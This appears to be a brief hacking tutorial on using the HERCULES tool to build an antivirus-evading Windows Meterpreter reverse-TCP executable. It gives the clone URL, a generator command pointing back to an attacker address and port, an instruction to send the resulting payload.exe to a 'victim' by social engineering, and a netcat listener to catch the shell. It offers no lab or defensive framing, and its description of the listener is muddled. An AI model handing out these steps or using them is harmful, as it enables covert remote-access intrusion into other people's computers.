HERCULES is a special payload generator that can bypass all antivirus software.
First clone Hercules repository from github, to do so type:
https://github.com/EgeBalci/HERCULES.git
Now Open kali linux terminal in the directory that you have downloaded Hercules and type the following command
./HERCULES_x64 192.168.0.105 4444 –p windows/meterpreter/reverse_tcp –a 64 –l dynamic
Now it will save a file with name payload.exe now send your exe files to victim using any social engineering technique.
Now open kali Linux terminal and type netcat command this will attempt to initiate a TCP to the defined host on the port number specified.
nc –l –p 4444